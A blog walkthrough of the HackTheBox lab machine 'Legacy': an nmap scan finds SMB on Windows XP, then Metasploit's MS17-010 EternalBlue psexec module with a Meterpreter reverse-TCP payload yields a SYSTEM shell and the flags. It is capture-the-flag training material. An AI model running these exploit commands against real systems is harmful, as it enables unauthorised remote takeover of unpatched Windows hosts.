Legacy HackTheBox WalkThrough

Legacy HackTheBox Walkthrough

This is Legacy HackTheBox Walkthrough. In this writeup I have demonstrated step-by-step procedure how I rooted Legacy HTB box. Before starting let us know something about this box. It is a windows box with IP address 10.10.10.4 and difficulty easy assigned by it’s maker. There are two ways two solve this box either go manually or use metasploit. I used the later one.

As always, connect your PC with VPN and make sure your connectivity by pinging the IP 10.10.10.4. If failed to connect make sure Legacy Box is running over the lab. If all goes correct then it is time to start hacking.

I started by scanning the box. Scanning give us the idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning too. Used nmap to scan the machine. The result is as follows:-

Scanning

$ nmap -sC -T3 -sV -oN legacy_scan.txt 10.10.10.4

Legacy Hackthebox nmap port scan

Two ports namely 139 & 445 are open. SMB service is running over them. nmap script smb-os-discovery discovered that the running OS is Windows XP. As soon as, I get SMB service running over windows machine up to windows 8, then first exploit comes in my mind is NSA's EternalBlue Doublepulsar, which was leaked by a hacker group Shadow Broker in 2017. Read more about this exploit here.

This exploit suite contain 7 exploit modules in which auxiliary/scanner/smb/smb_ms17_010 is a scanner module and others are exploiters. So tried each modules one by one and luckily exploit/windows/smb/ms17_010_psexec gave me the meterpreter shell. If you have newly installed Kali or Parrot OS then you may need to manually download this exploit from GitHub and install wine package. Here is the complete guide to configure. If you have already configured it then fine. Let us exploit the box. Here is the steps, which I used to get meterpreter shell.

Getting Meterpreter Shell

msf5 > search eternalblue

msf5 > use exploit/windows/smb/ms17_010_psexec

msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.4

msf5 exploit(windows/smb/ms17_010_psexec) > set LHOST 10.10.14.10

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

Getting Shell in Legacy HackTheBox walkthrough

We successfully have got a meterpreter shell. Used $getuid command to check what privilege do we have.

meterpreter > getuid

Checking the privilege of the User in Legacy Hackthebox walkthrough

We are NT AUTHORITY\SYSTEM which is the highest privilege a windows user has. This privilege is even higher than the privilege of an administrator account. Now we can capture our user flag and root flag. But, before this tried to upgrade the meterpreter shell to cmd prompt. Used $shell command to upgrade the meterpreter shell to fully qualified shell.

Upgrading Shell

meterpreter > shell

Upgrading meterpreter shell to cmd shell in Legacy Hackthebox walkthrough

User Flag

$ type \"Documents and Settings"\john\Desktop\user.txt

User flag found during legacy hackthebox walkthrough

Root Flag

$ type \"Documents and Settings"\Administrator\Desktop\root.txt

Root flag found during legacy hackthebox walkthrough

This was how I rooted Legacy HackTheBox. Thanks for reading this walkthrough. Hope you guys have learnt some new things from this box writeup. Please share your experience within the comment section. For any problem and suggestion related to walkthrough, feel free to write us at [email protected].

Next upcoming retired box walkthrough is Devel.

For more walkthrough on HackTheBox, machine always visit https://ethicalhacs.com

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/